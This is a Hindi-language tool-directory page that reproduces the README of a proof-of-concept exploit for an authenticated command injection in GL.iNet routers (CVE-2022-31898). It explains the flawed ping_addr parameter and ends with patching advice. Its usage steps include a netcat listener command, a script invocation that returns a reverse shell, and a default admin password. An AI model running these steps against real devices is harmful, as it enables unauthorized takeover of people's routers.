Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

प्रमाणित कमांड इंजेक्शन उपकरण (CVE-2022-31898) - HACKCONRD 2026।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🥭 मैंगोपंच: CVE-2022-31898

GL.iNet उपकरणों के लिए प्रमाणित OS कमांड इंजेक्शन

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 कमजोरी का अवलोकन

इस रिपॉजिटरी में GL.iNet MT300N-V2 (मैंगो) और अन्य मॉडलों में 3.215 से नीचे के फर्मवेयर संस्करणों में पाई गई रिमोट कमांड एग्जीक्यूशन (RCE) कमजोरी के लिए एक तकनीकी प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है।

यह दोष डायग्नोस्टिक API के ping_addr पैरामीटर में मौजूद है, जो एक प्रमाणित हमलावर को शेल मेटाकैरेक्टर (;) के माध्यम से मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है।


🚀 निष्पादन मार्गदर्शिका

1. अपना लिसनर तैयार करें

अपने हमलावर मशीन (Kali Linux) में एक टर्मिनल खोलें और Netcat लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 9292

2. एक्सप्लॉयट चलाएँ

रिवर्स शेल को ट्रिगर करने के लिए निम्नलिखित कमांड का उपयोग करें:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ स्क्रिप्ट पैरामीटर

झंडापूरा नामविवरणडिफ़ॉल्ट
-R--rhostरिमोट लक्ष्य IP (राउटर)आवश्यक
-P--rportवेब प्रबंधन पोर्ट443
-L--lhostलिसनर IP (काली/हमलावर)आवश्यक
-l--lportलिसनर पोर्टआवश्यक
-p--pwdएडमिन पासवर्डgoodlife
-t--httpsHTTPS सक्षम करेंFalse

🛡️ सुधार

  • फर्मवेयर अपडेट करें: सुनिश्चित करें कि आपका उपकरण संस्करण 3.215 या उच्चतर चला रहा है।
  • इनपुट सत्यापन: डेवलपर्स को IP/होस्टनेम पैरामीटर के लिए सख्त Regex सत्यापन लागू करना चाहिए और उन फ़ंक्शनों से बचना चाहिए जो शेल को कच्ची स्ट्रिंग्स पास करते हैं।

अस्वीकरण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। MangoPunch: CVE-2022-31898

टूल डाउनलोड करें